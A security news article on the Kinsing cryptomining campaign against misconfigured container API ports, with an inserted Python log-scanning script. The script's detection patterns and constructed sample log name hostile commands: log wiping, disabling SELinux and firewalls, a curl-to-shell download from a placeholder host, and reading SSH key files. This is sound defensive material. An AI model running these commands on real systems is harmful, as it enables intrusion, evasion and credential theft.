April 7, 2020 By Shane Schick 2 min read

A misconfigured API port has led to a months-long campaign in which cybercriminals have been launching daily Kinsing malware attacks that number in the thousands, according to security researchers.

Directed at enterprises operating container environments, the attack exploits the misconfigured API port on a host running Ubuntu, deploys the cryptocurrency miner and then tries to infect an ever-larger number of hosts, a report from Aqua Security noted.

Hackers rigged the Ubuntu container to clear logs, eliminate other malicious software and disable security protections. Once those tasks have been completed, the Kinsing malware download begins in order to mine for cryptocurrency on the compromised container.

An Ambitious Attack Scheme

Researchers said the exploit attempts to continue infecting other parts of the container network by using SSH credentials it collects along the way.

This allows cybercriminals to test an extensive number of key and user-account combinations, researchers added. If a login succeeds, a shell script then places the cryptocurrency miner on the newly infected host.

The investigation traced the origins of the campaign to Eastern Europe, where command-and-control (C&C) servers split the various functions required to manage the attacks. While miners can be designed for many different kinds of cryptocurrencies, the target, in this case, is bitcoin, researchers said.

Although the report described the campaign as ambitious, researchers suggested that the rise of cloud-native environments and the increased use of containers will lead more cybercriminals to follow similarly sophisticated approaches.

Don’t Let Kinsing Lead to Crypto-Mining

The obvious step for anyone vulnerable to an attack is to conduct a thorough review of their container environments. This should include looking for suspicious user activity in log files and checking for any areas where least privilege settings should be, but haven’t been, enforced.
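The log review recommended above can be partly automated by looking for the chain of behaviours the report attributes to the rigged container (log clearing, disabling protections, downloading a payload, reading SSH credentials). The script below is an added example, not code from the article or from Aqua Security; the command patterns and the log line format are assumptions chosen for illustration, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Illustrative command patterns for each behaviour class described in the
# report (assumed signatures for this example, not the campaign's actual commands).
RULES = {
    "clear_logs": re.compile(
        r"(?:rm\s+-[rf]+\s+\S*/var/log|>\s*/var/log/|history\s+-c|truncate\s+\S*/var/log)"),
    "disable_protection": re.compile(
        r"(?:setenforce\s+0|ufw\s+disable|iptables\s+-F\b|"
        r"systemctl\s+(?:stop|disable)\s+\S*(?:apparmor|firewalld|auditd))"),
    "download_and_run": re.compile(
        r"(?:curl|wget)\b.*?(?:\|\s*(?:ba)?sh\b|&&\s*chmod\s+\+x)"),
    "ssh_harvest": re.compile(
        r"(?:cat|grep|find)\b.*?\.ssh/(?:known_hosts|id_rsa|config|authorized_keys)"),
}

# Assumed log format: one command execution per line, tagged with the container id.
LINE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+container=(?P<cid>\S+)'
                  r'\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$')

def parse_line(line):
    m = LINE.match(line.strip())
    return m.groupdict() if m else None

def classify(cmd):
    """Return the behaviour classes a single command matches."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]

def find_suspicious_chains(lines, min_classes=2):
    """Group hits per container; a container showing min_classes or more
    distinct behaviour classes is reported as a suspicious chain, which
    cuts down on noise from a lone 'history -c' or firewall change."""
    hits = defaultdict(dict)  # cid -> {class: first matching command}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for cls in classify(rec["cmd"]):
            hits[rec["cid"]].setdefault(cls, rec["cmd"])
    return {cid: h for cid, h in hits.items() if len(h) >= min_classes}

# Constructed sample log: one container runs the full chain, another only clears history.
SAMPLE_LOG = """\
2020-04-01T10:15:02Z host=node-3 container=a1b2c3 user=root cmd="rm -rf /var/log/*"
2020-04-01T10:15:03Z host=node-3 container=a1b2c3 user=root cmd="setenforce 0"
2020-04-01T10:15:05Z host=node-3 container=a1b2c3 user=root cmd="curl -s http://example.invalid/x.sh | sh"
2020-04-01T10:16:40Z host=node-3 container=a1b2c3 user=root cmd="cat /root/.ssh/known_hosts"
2020-04-01T10:20:11Z host=node-7 container=d4e5f6 user=app cmd="python3 app.py"
2020-04-01T10:21:00Z host=node-7 container=d4e5f6 user=app cmd="history -c"
"""

if __name__ == "__main__":
    for cid, chain in find_suspicious_chains(SAMPLE_LOG.splitlines()).items():
        print(cid, sorted(chain))
```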

Beyond that, organizations need to recognize where container security responsibilities lie. Some areas may be dealt with by providers but others — including vulnerability management and continuous event monitoring — should be directly under the IT security team’s control.
